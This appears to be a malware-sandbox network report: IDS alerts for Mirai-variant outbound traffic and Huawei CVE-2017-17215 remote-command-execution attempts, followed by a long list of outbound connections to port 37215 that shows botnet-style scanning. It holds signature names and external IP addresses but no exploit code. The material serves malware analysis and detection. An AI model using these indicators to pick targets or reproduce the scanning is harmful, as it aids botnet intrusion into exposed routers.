                                                            192.168.2.2395.213.238.6953502802839471 02/14/24-09:29:15.490054TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5350280192.168.2.2395.213.238.69
                                                            192.168.2.2395.101.227.15841548802839471 02/14/24-09:30:11.437235TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4154880192.168.2.2395.101.227.158
                                                            192.168.2.2388.212.236.4458970802839471 02/14/24-09:29:45.898333TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5897080192.168.2.2388.212.236.44
                                                            192.168.2.2395.110.223.14444726802839471 02/14/24-09:28:49.340445TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4472680192.168.2.2395.110.223.144
                                                            192.168.2.2395.217.210.6658200802839471 02/14/24-09:28:26.069185TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5820080192.168.2.2395.217.210.66
                                                            192.168.2.23112.15.44.20136500802839471 02/14/24-09:30:15.948895TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3650080192.168.2.23112.15.44.201
                                                            192.168.2.2395.169.186.21543252802839471 02/14/24-09:28:01.088456TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4325280192.168.2.2395.169.186.215
                                                            192.168.2.23112.133.19.3153460802839471 02/14/24-09:29:52.218101TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5346080192.168.2.23112.133.19.31
                                                            192.168.2.23112.165.90.23553996802839471 02/14/24-09:28:12.112287TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5399680192.168.2.23112.165.90.235
                                                            192.168.2.2395.100.121.12042604802839471 02/14/24-09:29:42.976136TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4260480192.168.2.2395.100.121.120
                                                            192.168.2.2388.26.248.10357062802839471 02/14/24-09:29:38.044745TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5706280192.168.2.2388.26.248.103
                                                            192.168.2.2395.100.182.12939728802839471 02/14/24-09:28:10.749931TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3972880192.168.2.2395.100.182.129
                                                            192.168.2.2388.193.231.12350324802839471 02/14/24-09:28:52.972108TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5032480192.168.2.2388.193.231.123
                                                            192.168.2.2395.42.21.10838920802839471 02/14/24-09:28:40.803893TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3892080192.168.2.2395.42.21.108
                                                            192.168.2.23112.125.90.5349072802839471 02/14/24-09:27:59.103960TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4907280192.168.2.23112.125.90.53
                                                            192.168.2.2388.99.58.23857324802839471 02/14/24-09:30:21.563970TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5732480192.168.2.2388.99.58.238
                                                            192.168.2.23112.104.30.15751728802839471 02/14/24-09:29:48.045294TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5172880192.168.2.23112.104.30.157
                                                            192.168.2.2388.86.193.21733036802839471 02/14/24-09:30:16.056657TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3303680192.168.2.2388.86.193.217
                                                            192.168.2.2388.99.203.16552322802839471 02/14/24-09:29:30.085432TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5232280192.168.2.2388.99.203.165
                                                            192.168.2.2388.249.192.7747698802839471 02/14/24-09:29:50.326426TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4769880192.168.2.2388.249.192.77
                                                            192.168.2.2395.56.17.3141482802839471 02/14/24-09:29:04.304539TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4148280192.168.2.2395.56.17.31
                                                            192.168.2.23112.12.91.12451824802839471 02/14/24-09:30:12.978098TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5182480192.168.2.23112.12.91.124
                                                            192.168.2.2395.179.136.13257944802839471 02/14/24-09:28:23.324354TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5794480192.168.2.2395.179.136.132
                                                            192.168.2.23112.78.125.8555736802839471 02/14/24-09:27:52.686553TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5573680192.168.2.23112.78.125.85
                                                            192.168.2.2395.179.188.9144648802839471 02/14/24-09:28:55.202511TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4464880192.168.2.2395.179.188.91
                                                            192.168.2.2395.101.47.8842882802839471 02/14/24-09:28:19.935891TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4288280192.168.2.2395.101.47.88
                                                            192.168.2.23112.196.3.8956708802839471 02/14/24-09:29:48.086733TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5670880192.168.2.23112.196.3.89
                                                            192.168.2.2395.167.47.13450560802839471 02/14/24-09:28:01.109435TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5056080192.168.2.2395.167.47.134
                                                            192.168.2.2395.217.70.2148640802839471 02/14/24-09:28:44.449416TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4864080192.168.2.2395.217.70.21
                                                            192.168.2.2395.163.85.5534834802839471 02/14/24-09:29:19.328625TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3483480192.168.2.2395.163.85.55
                                                            192.168.2.23112.222.171.13338992802839471 02/14/24-09:29:36.387882TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3899280192.168.2.23112.222.171.133
                                                            192.168.2.23112.74.58.20243896802839471 02/14/24-09:29:01.191100TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4389680192.168.2.23112.74.58.202
                                                            192.168.2.2395.216.243.18458036802839471 02/14/24-09:29:51.822913TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5803680192.168.2.2395.216.243.184
                                                            192.168.2.23112.125.88.5153594802839471 02/14/24-09:29:01.534531TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5359480192.168.2.23112.125.88.51
                                                            192.168.2.23112.95.139.15256774802839471 02/14/24-09:28:11.460050TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5677480192.168.2.23112.95.139.152
                                                            192.168.2.2395.216.223.16041642802839471 02/14/24-09:29:55.867900TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4164280192.168.2.2395.216.223.160
                                                            192.168.2.23112.126.71.7239760802839471 02/14/24-09:29:12.675045TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3976080192.168.2.23112.126.71.72
                                                            192.168.2.2395.216.94.23456740802839471 02/14/24-09:27:55.229136TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5674080192.168.2.2395.216.94.234
                                                            192.168.2.23112.196.118.12355390802839471 02/14/24-09:29:05.983813TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5539080192.168.2.23112.196.118.123
                                                            192.168.2.2395.12.141.11352072802839471 02/14/24-09:29:24.277982TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5207280192.168.2.2395.12.141.113
                                                            192.168.2.2395.146.22.23436670802839471 02/14/24-09:28:39.762053TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3667080192.168.2.2395.146.22.234
                                                            192.168.2.23112.17.55.2438972802839471 02/14/24-09:29:59.584615TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3897280192.168.2.23112.17.55.24
                                                            192.168.2.2395.86.64.15637262802839471 02/14/24-09:30:25.559168TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3726280192.168.2.2395.86.64.156
                                                            192.168.2.2388.210.100.18241970802839471 02/14/24-09:29:50.056006TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4197080192.168.2.2388.210.100.182
                                                            192.168.2.23112.74.204.4857264802839471 02/14/24-09:27:59.068447TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5726480192.168.2.23112.74.204.48
                                                            192.168.2.23112.31.114.22450784802839471 02/14/24-09:28:19.541657TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5078480192.168.2.23112.31.114.224
                                                            192.168.2.2395.163.50.17859032802839471 02/14/24-09:29:58.688330TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5903280192.168.2.2395.163.50.178
                                                            192.168.2.23112.74.125.7553494802839471 02/14/24-09:29:04.014234TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5349480192.168.2.23112.74.125.75
                                                            192.168.2.23112.74.188.11053038802839471 02/14/24-09:29:27.833050TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5303880192.168.2.23112.74.188.110
                                                            192.168.2.2395.100.211.20643212802839471 02/14/24-09:29:08.609039TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4321280192.168.2.2395.100.211.206
                                                            192.168.2.2395.181.177.14141392802839471 02/14/24-09:30:25.533404TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4139280192.168.2.2395.181.177.141
                                                            192.168.2.23112.216.162.19549292802839471 02/14/24-09:29:25.165000TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4929280192.168.2.23112.216.162.195
                                                            192.168.2.2341.37.168.25339832372152829579 02/14/24-09:27:59.210683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3983237215192.168.2.2341.37.168.253
                                                            192.168.2.2395.101.176.16435496802839471 02/14/24-09:30:23.035001TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3549680192.168.2.2395.101.176.164
                                                            192.168.2.2395.100.79.9352400802839471 02/14/24-09:29:08.791009TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5240080192.168.2.2395.100.79.93
                                                            192.168.2.2388.208.215.21539454802839471 02/14/24-09:28:14.075149TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3945480192.168.2.2388.208.215.215
                                                            192.168.2.23112.54.163.17649856802839471 02/14/24-09:29:01.229051TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4985680192.168.2.23112.54.163.176
                                                            192.168.2.2395.100.150.13038964802839471 02/14/24-09:28:16.534972TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3896480192.168.2.2395.100.150.130
                                                            192.168.2.2388.218.206.3336796802839471 02/14/24-09:27:46.135641TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3679680192.168.2.2388.218.206.33
                                                            192.168.2.2395.217.246.9750256802839471 02/14/24-09:29:58.688220TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5025680192.168.2.2395.217.246.97
                                                            192.168.2.23112.171.232.733260802839471 02/14/24-09:30:12.568138TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3326080192.168.2.23112.171.232.7
                                                            192.168.2.2395.48.59.23454852802839471 02/14/24-09:29:12.927921TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5485280192.168.2.2395.48.59.234
                                                            192.168.2.2395.128.137.16137494802839471 02/14/24-09:29:18.366180TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3749480192.168.2.2395.128.137.161
                                                            192.168.2.2388.149.106.3046024802839471 02/14/24-09:28:03.590332TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4602480192.168.2.2388.149.106.30
                                                            192.168.2.2395.56.128.8748492802839471 02/14/24-09:29:15.566742TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4849280192.168.2.2395.56.128.87
                                                            192.168.2.2395.9.91.656188802839471 02/14/24-09:29:41.037745TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5618880192.168.2.2395.9.91.6
                                                            192.168.2.2395.217.39.2448248802839471 02/14/24-09:28:39.781400TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4824880192.168.2.2395.217.39.24
                                                            192.168.2.23197.214.103.17450032372152829579 02/14/24-09:29:39.586861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003237215192.168.2.23197.214.103.174
                                                            192.168.2.2395.101.243.20046210802839471 02/14/24-09:28:39.751535TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4621080192.168.2.2395.101.243.200
                                                            192.168.2.2341.37.168.25339832372152835222 02/14/24-09:27:59.210683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3983237215192.168.2.2341.37.168.253
                                                            192.168.2.2395.216.46.1250504802839471 02/14/24-09:28:19.746311TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5050480192.168.2.2395.216.46.12
                                                            192.168.2.2395.140.239.10742770802839471 02/14/24-09:28:32.587064TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4277080192.168.2.2395.140.239.107
                                                            192.168.2.2388.135.44.10454478802839471 02/14/24-09:30:22.257781TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5447880192.168.2.2388.135.44.104
                                                            192.168.2.2395.58.238.12749702802839471 02/14/24-09:28:07.186237TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4970280192.168.2.2395.58.238.127
                                                            192.168.2.2388.221.57.13847026802839471 02/14/24-09:28:37.778893TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4702680192.168.2.2388.221.57.138
                                                            192.168.2.2395.124.249.24940568802839471 02/14/24-09:28:45.322585TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4056880192.168.2.2395.124.249.249
                                                            192.168.2.23112.197.1.5248894802839471 02/14/24-09:29:48.432648TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4889480192.168.2.23112.197.1.52
                                                            192.168.2.2395.168.237.1443142802839471 02/14/24-09:28:16.760945TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4314280192.168.2.2395.168.237.14
                                                            192.168.2.2395.101.249.17241212802839471 02/14/24-09:29:29.855136TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4121280192.168.2.2395.101.249.172
                                                            192.168.2.2395.86.74.20760852802839471 02/14/24-09:30:07.441131TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6085280192.168.2.2395.86.74.207
                                                            192.168.2.2395.216.139.7339164802839471 02/14/24-09:29:24.173544TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3916480192.168.2.2395.216.139.73
                                                            192.168.2.2395.179.189.4846852802839471 02/14/24-09:29:08.589998TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4685280192.168.2.2395.179.189.48
                                                            192.168.2.2395.100.176.5340406802839471 02/14/24-09:29:23.927209TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4040680192.168.2.2395.100.176.53
                                                            192.168.2.23112.51.126.12033586802839471 02/14/24-09:27:59.114628TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3358680192.168.2.23112.51.126.120
                                                            192.168.2.2395.67.71.23456348802839471 02/14/24-09:28:29.542062TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5634880192.168.2.2395.67.71.234
                                                            192.168.2.2395.164.195.17243370802839471 02/14/24-09:27:55.010400TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4337080192.168.2.2395.164.195.172
                                                            192.168.2.2388.99.125.24459298802839471 02/14/24-09:29:32.528328TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5929880192.168.2.2388.99.125.244
                                                            192.168.2.2395.217.73.3647458802839471 02/14/24-09:30:23.052468TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4745880192.168.2.2395.217.73.36
                                                            192.168.2.2395.86.77.1334366802839471 02/14/24-09:29:04.270458TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3436680192.168.2.2395.86.77.13
                                                            • Total Packets: 9446
                                                            • 37215 undefined
                                                            • 8080 undefined
                                                            • 2323 undefined
                                                            • 1024 undefined
                                                            • 443 (HTTPS)
                                                            • 80 (HTTP)
                                                            • 23 (Telnet)
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Feb 14, 2024 09:27:40.742063999 CET43928443192.168.2.2391.189.91.42
                                                            Feb 14, 2024 09:27:40.863399982 CET4067537215192.168.2.2341.238.253.12
                                                            Feb 14, 2024 09:27:40.863415003 CET4067537215192.168.2.2341.233.251.12
                                                            Feb 14, 2024 09:27:40.863428116 CET4067537215192.168.2.2341.201.107.229
                                                            Feb 14, 2024 09:27:40.863442898 CET4067537215192.168.2.2341.82.118.13
                                                            Feb 14, 2024 09:27:40.863483906 CET4067537215192.168.2.2341.101.233.103
                                                            Feb 14, 2024 09:27:40.863497972 CET4067537215192.168.2.2341.173.156.57
                                                            Feb 14, 2024 09:27:40.863547087 CET4067537215192.168.2.2341.28.117.199
                                                            Feb 14, 2024 09:27:40.863559008 CET4067537215192.168.2.2341.172.182.152
                                                            Feb 14, 2024 09:27:40.863639116 CET4067537215192.168.2.2341.33.77.96
                                                            Feb 14, 2024 09:27:40.863691092 CET4067537215192.168.2.2341.97.93.215
                                                            Feb 14, 2024 09:27:40.863693953 CET4067537215192.168.2.2341.153.208.96
                                                            Feb 14, 2024 09:27:40.863699913 CET4067537215192.168.2.2341.207.63.188
                                                            Feb 14, 2024 09:27:40.863704920 CET4067537215192.168.2.2341.104.118.68
                                                            Feb 14, 2024 09:27:40.863727093 CET4067537215192.168.2.2341.224.111.154
                                                            Feb 14, 2024 09:27:40.863743067 CET4067537215192.168.2.2341.65.137.250
                                                            Feb 14, 2024 09:27:40.863756895 CET4067537215192.168.2.2341.89.128.97
                                                            Feb 14, 2024 09:27:40.863766909 CET4067537215192.168.2.2341.42.190.146
                                                            Feb 14, 2024 09:27:40.863795042 CET4067537215192.168.2.2341.92.60.120
                                                            Feb 14, 2024 09:27:40.863847971 CET4067537215192.168.2.2341.238.50.94
                                                            Feb 14, 2024 09:27:40.863928080 CET4067537215192.168.2.2341.197.253.138
                                                            Feb 14, 2024 09:27:40.863929033 CET4067537215192.168.2.2341.122.54.133
                                                            Feb 14, 2024 09:27:40.863929987 CET4067537215192.168.2.2341.235.100.42
                                                            Feb 14, 2024 09:27:40.863929987 CET4067537215192.168.2.2341.206.159.142
                                                            Feb 14, 2024 09:27:40.863930941 CET4067537215192.168.2.2341.100.10.252
                                                            Feb 14, 2024 09:27:40.863945007 CET4067537215192.168.2.2341.21.93.221
                                                            Feb 14, 2024 09:27:40.863984108 CET4067537215192.168.2.2341.129.55.127
                                                            Feb 14, 2024 09:27:40.864002943 CET4067537215192.168.2.2341.2.24.227
                                                            Feb 14, 2024 09:27:40.864037037 CET4067537215192.168.2.2341.166.167.71
                                                            Feb 14, 2024 09:27:40.864053965 CET4067537215192.168.2.2341.227.42.122
                                                            Feb 14, 2024 09:27:40.864108086 CET4067537215192.168.2.2341.1.198.96
                                                            Feb 14, 2024 09:27:40.864156961 CET4067537215192.168.2.2341.247.240.79
                                                            Feb 14, 2024 09:27:40.864161015 CET4067537215192.168.2.2341.111.120.147
                                                            Feb 14, 2024 09:27:40.864165068 CET4067537215192.168.2.2341.15.128.236
                                                            Feb 14, 2024 09:27:40.864165068 CET4067537215192.168.2.2341.178.25.65
                                                            Feb 14, 2024 09:27:40.864176035 CET4067537215192.168.2.2341.252.233.17
                                                            Feb 14, 2024 09:27:40.864183903 CET4067537215192.168.2.2341.37.96.105
                                                            Feb 14, 2024 09:27:40.864206076 CET4067537215192.168.2.2341.109.164.178
                                                            Feb 14, 2024 09:27:40.864217997 CET4067537215192.168.2.2341.130.74.65
                                                            Feb 14, 2024 09:27:40.864252090 CET4067537215192.168.2.2341.68.243.95
                                                            Feb 14, 2024 09:27:40.864279032 CET4067537215192.168.2.2341.161.120.55
                                                            Feb 14, 2024 09:27:40.864303112 CET4067537215192.168.2.2341.127.199.121
                                                            Feb 14, 2024 09:27:40.864310026 CET4067537215192.168.2.2341.71.103.255
                                                            Feb 14, 2024 09:27:40.864327908 CET4067537215192.168.2.2341.97.52.37
                                                            Feb 14, 2024 09:27:40.864366055 CET4067537215192.168.2.2341.197.154.216
                                                            Feb 14, 2024 09:27:40.864372015 CET4067537215192.168.2.2341.46.164.29
                                                            Feb 14, 2024 09:27:40.864458084 CET4067537215192.168.2.2341.195.50.118
                                                            Feb 14, 2024 09:27:40.864464998 CET4067537215192.168.2.2341.228.247.17
                                                            Feb 14, 2024 09:27:40.864473104 CET4067537215192.168.2.2341.201.58.111
                                                            Feb 14, 2024 09:27:40.864476919 CET4067537215192.168.2.2341.56.125.54
                                                            Feb 14, 2024 09:27:40.864492893 CET4067537215192.168.2.2341.78.121.236
                                                            Feb 14, 2024 09:27:40.864512920 CET4067537215192.168.2.2341.136.8.167
                                                            Feb 14, 2024 09:27:40.864526987 CET4067537215192.168.2.2341.224.86.160
                                                            Feb 14, 2024 09:27:40.864531040 CET4067537215192.168.2.2341.253.37.149
                                                            Feb 14, 2024 09:27:40.864542961 CET4067537215192.168.2.2341.24.230.34
                                                            Feb 14, 2024 09:27:40.864556074 CET4067537215192.168.2.2341.153.220.168
                                                            Feb 14, 2024 09:27:40.864588976 CET4067537215192.168.2.2341.56.79.31
                                                            Feb 14, 2024 09:27:40.864610910 CET4067537215192.168.2.2341.46.191.206
                                                            Feb 14, 2024 09:27:40.864669085 CET4067537215192.168.2.2341.14.129.61
                                                            Feb 14, 2024 09:27:40.864698887 CET4067537215192.168.2.2341.187.16.103
                                                            Feb 14, 2024 09:27:40.864705086 CET4067537215192.168.2.2341.12.102.208
                                                            Feb 14, 2024 09:27:40.864716053 CET4067537215192.168.2.2341.31.255.119
                                                            Feb 14, 2024 09:27:40.864729881 CET4067537215192.168.2.2341.222.102.234
                                                            Feb 14, 2024 09:27:40.864739895 CET4067537215192.168.2.2341.253.7.7
                                                            Feb 14, 2024 09:27:40.864761114 CET4067537215192.168.2.2341.100.80.135
                                                            Feb 14, 2024 09:27:40.864778042 CET4067537215192.168.2.2341.242.159.121
                                                            Feb 14, 2024 09:27:40.864861012 CET4067537215192.168.2.2341.101.190.115
                                                            Feb 14, 2024 09:27:40.864861965 CET4067537215192.168.2.2341.121.151.34
                                                            Feb 14, 2024 09:27:40.864861965 CET4067537215192.168.2.2341.36.79.250
                                                            Feb 14, 2024 09:27:40.864890099 CET4067537215192.168.2.2341.240.133.171
                                                            Feb 14, 2024 09:27:40.864895105 CET4067537215192.168.2.2341.152.161.78
                                                            Feb 14, 2024 09:27:40.864919901 CET4067537215192.168.2.2341.85.153.144
                                                            Feb 14, 2024 09:27:40.864939928 CET4067537215192.168.2.2341.162.133.199
                                                            Feb 14, 2024 09:27:40.864953995 CET4067537215192.168.2.2341.80.116.43
                                                            Feb 14, 2024 09:27:40.864974022 CET4067537215192.168.2.2341.67.197.197
                                                            Feb 14, 2024 09:27:40.864999056 CET4067537215192.168.2.2341.148.118.4
                                                            Feb 14, 2024 09:27:40.865019083 CET4067537215192.168.2.2341.146.95.138
                                                            Feb 14, 2024 09:27:40.865031958 CET4067537215192.168.2.2341.46.119.60
                                                            Feb 14, 2024 09:27:40.865046024 CET4067537215192.168.2.2341.92.86.182
                                                            Feb 14, 2024 09:27:40.865130901 CET4067537215192.168.2.2341.89.106.44
                                                            Feb 14, 2024 09:27:40.865134001 CET4067537215192.168.2.2341.66.65.164
                                                            Feb 14, 2024 09:27:40.865140915 CET4067537215192.168.2.2341.245.131.131
                                                            Feb 14, 2024 09:27:40.865140915 CET4067537215192.168.2.2341.149.127.31
                                                            Feb 14, 2024 09:27:40.865140915 CET4067537215192.168.2.2341.84.229.20
                                                            Feb 14, 2024 09:27:40.865164042 CET4067537215192.168.2.2341.221.139.36
                                                            Feb 14, 2024 09:27:40.865175962 CET4067537215192.168.2.2341.25.130.104
                                                            Feb 14, 2024 09:27:40.865194082 CET4067537215192.168.2.2341.188.228.38
                                                            Feb 14, 2024 09:27:40.865195036 CET4067537215192.168.2.2341.38.117.31
                                                            Feb 14, 2024 09:27:40.865241051 CET4067537215192.168.2.2341.11.226.109
                                                            Feb 14, 2024 09:27:40.865256071 CET4067537215192.168.2.2341.67.136.72
                                                            Feb 14, 2024 09:27:40.865278006 CET4067537215192.168.2.2341.102.243.246
                                                            Feb 14, 2024 09:27:40.865293026 CET4067537215192.168.2.2341.119.121.152
                                                            Feb 14, 2024 09:27:40.865360022 CET4067537215192.168.2.2341.175.34.101
                                                            Feb 14, 2024 09:27:40.865391970 CET4067537215192.168.2.2341.161.178.217
                                                            Feb 14, 2024 09:27:40.865398884 CET4067537215192.168.2.2341.213.48.0
                                                            Feb 14, 2024 09:27:40.865405083 CET4067537215192.168.2.2341.255.218.163
                                                            Feb 14, 2024 09:27:40.865441084 CET4067537215192.168.2.2341.206.35.118
                                                            Feb 14, 2024 09:27:40.865454912 CET4067537215192.168.2.2341.239.173.212
                                                            Feb 14, 2024 09:27:40.865473032 CET4067537215192.168.2.2341.15.224.58
                                                            Feb 14, 2024 09:27:40.865492105 CET4067537215192.168.2.2341.248.44.0
                                                            Feb 14, 2024 09:27:40.865520954 CET4067537215192.168.2.2341.124.23.25
                                                            Feb 14, 2024 09:27:40.865559101 CET4067537215192.168.2.2341.31.8.239
                                                            Feb 14, 2024 09:27:40.865586042 CET4067537215192.168.2.2341.231.184.79
                                                            Feb 14, 2024 09:27:40.865592003 CET4067537215192.168.2.2341.120.117.58
                                                            Feb 14, 2024 09:27:40.865627050 CET4067537215192.168.2.2341.235.110.240
                                                            Feb 14, 2024 09:27:40.865709066 CET4067537215192.168.2.2341.136.174.81
                                                            Feb 14, 2024 09:27:40.865710020 CET4067537215192.168.2.2341.89.195.14
                                                            Feb 14, 2024 09:27:40.865710020 CET4067537215192.168.2.2341.234.108.51
                                                            Feb 14, 2024 09:27:40.865710020 CET4067537215192.168.2.2341.211.188.93
                                                            Feb 14, 2024 09:27:40.865730047 CET4067537215192.168.2.2341.152.184.171
                                                            Feb 14, 2024 09:27:40.865751982 CET4067537215192.168.2.2341.35.161.171
                                                            Feb 14, 2024 09:27:40.865760088 CET4067537215192.168.2.2341.109.211.145
                                                            Feb 14, 2024 09:27:40.865761995 CET4067537215192.168.2.2341.212.50.52
                                                            Feb 14, 2024 09:27:40.865781069 CET4067537215192.168.2.2341.2.230.194
                                                            Feb 14, 2024 09:27:40.865812063 CET4067537215192.168.2.2341.174.201.128
                                                            Feb 14, 2024 09:27:40.865834951 CET4067537215192.168.2.2341.178.88.36
                                                            Feb 14, 2024 09:27:40.865915060 CET4067537215192.168.2.2341.167.125.59
                                                            Feb 14, 2024 09:27:40.865915060 CET4067537215192.168.2.2341.135.83.214
                                                            Feb 14, 2024 09:27:40.865916014 CET4067537215192.168.2.2341.128.25.246
                                                            Feb 14, 2024 09:27:40.865917921 CET4067537215192.168.2.2341.172.71.73
                                                            Feb 14, 2024 09:27:40.865932941 CET4067537215192.168.2.2341.226.86.52
                                                            Feb 14, 2024 09:27:40.865957975 CET4067537215192.168.2.2341.124.106.9
                                                            Feb 14, 2024 09:27:40.865963936 CET4067537215192.168.2.2341.252.76.193
                                                            Feb 14, 2024 09:27:40.865978956 CET4067537215192.168.2.2341.241.118.238
                                                            Feb 14, 2024 09:27:40.866002083 CET4067537215192.168.2.2341.127.120.91
                                                            Feb 14, 2024 09:27:40.866028070 CET4067537215192.168.2.2341.24.242.134
                                                            Feb 14, 2024 09:27:40.866044998 CET4067537215192.168.2.2341.179.182.123
                                                            Feb 14, 2024 09:27:40.866070986 CET4067537215192.168.2.2341.207.110.177
                                                            Feb 14, 2024 09:27:40.866086960 CET4067537215192.168.2.2341.206.14.252
                                                            Feb 14, 2024 09:27:40.866101027 CET4067537215192.168.2.2341.163.76.188
                                                            Feb 14, 2024 09:27:40.866183996 CET4067537215192.168.2.2341.231.89.54
                                                            Feb 14, 2024 09:27:40.866183996 CET4067537215192.168.2.2341.189.116.101
                                                            Feb 14, 2024 09:27:40.866187096 CET4067537215192.168.2.2341.205.113.57
                                                            Feb 14, 2024 09:27:40.866189003 CET4067537215192.168.2.2341.239.32.36
                                                            Feb 14, 2024 09:27:40.866235018 CET4067537215192.168.2.2341.207.14.93
                                                            Feb 14, 2024 09:27:40.866247892 CET4067537215192.168.2.2341.32.81.251
                                                            Feb 14, 2024 09:27:40.866261959 CET4067537215192.168.2.2341.199.242.35
                                                            Feb 14, 2024 09:27:40.866283894 CET4067537215192.168.2.2341.53.80.222
                                                            Feb 14, 2024 09:27:40.866298914 CET4067537215192.168.2.2341.248.13.40
                                                            Feb 14, 2024 09:27:40.866321087 CET4067537215192.168.2.2341.199.34.106
                                                            Feb 14, 2024 09:27:40.866380930 CET4067537215192.168.2.2341.213.217.10
                                                            Feb 14, 2024 09:27:40.866413116 CET4067537215192.168.2.2341.200.120.183
                                                            Feb 14, 2024 09:27:40.866442919 CET4067537215192.168.2.2341.34.136.76
                                                            Feb 14, 2024 09:27:40.866447926 CET4067537215192.168.2.2341.136.40.106
                                                            Feb 14, 2024 09:27:40.866447926 CET4067537215192.168.2.2341.8.129.38
                                                            Feb 14, 2024 09:27:40.866461039 CET4067537215192.168.2.2341.28.155.70
                                                            Feb 14, 2024 09:27:40.866481066 CET4067537215192.168.2.2341.137.151.110
                                                            Feb 14, 2024 09:27:40.866517067 CET4067537215192.168.2.2341.24.143.162
                                                            Feb 14, 2024 09:27:40.866542101 CET4067537215192.168.2.2341.249.203.37
                                                            Feb 14, 2024 09:27:40.866554022 CET4067537215192.168.2.2341.163.122.146
                                                            Feb 14, 2024 09:27:40.866575003 CET4067537215192.168.2.2341.220.95.227
